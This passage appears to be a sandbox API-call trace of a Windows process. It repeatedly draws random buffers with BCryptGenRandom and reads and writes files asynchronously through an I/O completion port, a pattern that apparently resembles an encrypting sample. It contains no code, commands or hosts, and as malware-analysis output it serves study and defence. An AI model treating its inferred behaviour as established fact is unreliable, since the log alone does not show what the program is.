lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0162.799] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.811] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.811] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.811] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.811] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.811] free (_Block=0x3e305b8) [0162.811] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.811] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.812] free (_Block=0x1fa91d0) [0162.812] free (_Block=0x1fa2ed8) [0162.812] free (_Block=0x1fa90b8) [0162.812] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0162.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.923] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.925] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.925] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0162.925] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0162.926] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0162.926] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0162.926] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0162.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0162.926] free (_Block=0x3e305b8) [0162.926] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0162.926] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0162.927] free (_Block=0x1fa91d0) [0162.927] free (_Block=0x1fa2ed8) [0162.927] free (_Block=0x1fa90b8) [0162.927] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.928] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.928] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x4ae0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0162.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.931] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0xb9e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0162.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0162.931] CloseHandle (hObject=0x3cc) returned 1 [0162.931] free (_Block=0x3f70048) [0162.931] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0163.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0163.010] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.010] free (_Block=0x3e305b8) [0163.010] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.010] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.010] free (_Block=0x1fa91d0) [0163.010] free (_Block=0x1fa2ed8) [0163.011] free (_Block=0x1fa90b8) [0163.011] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.016] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0163.025] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.026] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0163.026] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.026] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.026] free (_Block=0x3e305b8) [0163.026] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.026] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.027] free (_Block=0x1fa91d0) [0163.027] free (_Block=0x1fa2ed8) [0163.027] free (_Block=0x1fa90b8) [0163.027] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0163.029] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.035] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.035] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0163.035] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.036] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.036] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0163.036] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.036] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.036] free (_Block=0x3e305b8) [0163.036] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.036] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.036] free (_Block=0x1fa91d0) [0163.036] free (_Block=0x1fa2ed8) [0163.036] free (_Block=0x1fa90b8) [0163.036] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0163.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0163.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.042] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0163.042] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.042] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.042] free (_Block=0x3e305b8) [0163.042] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.042] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0163.042] free (_Block=0x1fa91d0) [0163.042] free (_Block=0x77d7a8) [0163.042] free (_Block=0x1fa90b8) [0163.042] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0163.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.054] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0163.055] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.079] CloseHandle (hObject=0x3cc) returned 1 [0163.079] free (_Block=0x3df0008) [0163.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.093] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0163.106] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.115] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0xdc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0163.115] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.122] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x918, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0163.122] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0163.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.133] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.133] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0163.133] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0163.134] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0163.134] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0163.134] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0163.134] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0163.134] free (_Block=0x3e305b8) [0163.134] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0163.134] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0163.135] free (_Block=0x1fa91d0) [0163.135] free (_Block=0x1fa2ed8) [0163.135] free (_Block=0x1fa90b8) [0163.135] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0163.135] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.205] CloseHandle (hObject=0x3cc) returned 1 [0165.205] free (_Block=0x3e70008) [0165.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.217] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.217] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.217] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.218] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.218] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.218] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.218] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.218] free (_Block=0x3e305b8) [0165.218] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.219] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.219] free (_Block=0x1fa91d0) [0165.219] free (_Block=0x1fa2ed8) [0165.219] free (_Block=0x1fa90b8) [0165.219] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.219] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.233] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x1440, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.233] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.234] WriteFile (in: hFile=0x170, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0165.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.235] CloseHandle (hObject=0x3cc) returned 1 [0165.238] free (_Block=0x3e70008) [0165.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.244] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x88c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.244] CloseHandle (hObject=0x2a4) returned 1 [0165.244] free (_Block=0x1ff1e60) [0165.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.264] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.264] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.264] free (_Block=0x3e305b8) [0165.264] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.264] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.265] free (_Block=0x1fa91d0) [0165.265] free (_Block=0x1fa2ed8) [0165.265] free (_Block=0x1fa90b8) [0165.265] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0165.265] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.270] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0165.270] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.295] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.295] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.296] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.296] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.296] free (_Block=0x3e305b8) [0165.296] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.296] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.297] free (_Block=0x1fa91d0) [0165.297] free (_Block=0x1fa2ed8) [0165.297] free (_Block=0x1fa90b8) [0165.297] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0165.297] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0165.304] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0165.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0165.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0165.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0165.306] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0165.306] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0165.306] free (_Block=0x3e305b8) [0165.306] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0165.306] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0165.307] free (_Block=0x1fa91d0) [0165.307] free (_Block=0x1fa2ed8) [0165.307] free (_Block=0x1fa90b8) [0165.307] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0165.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) 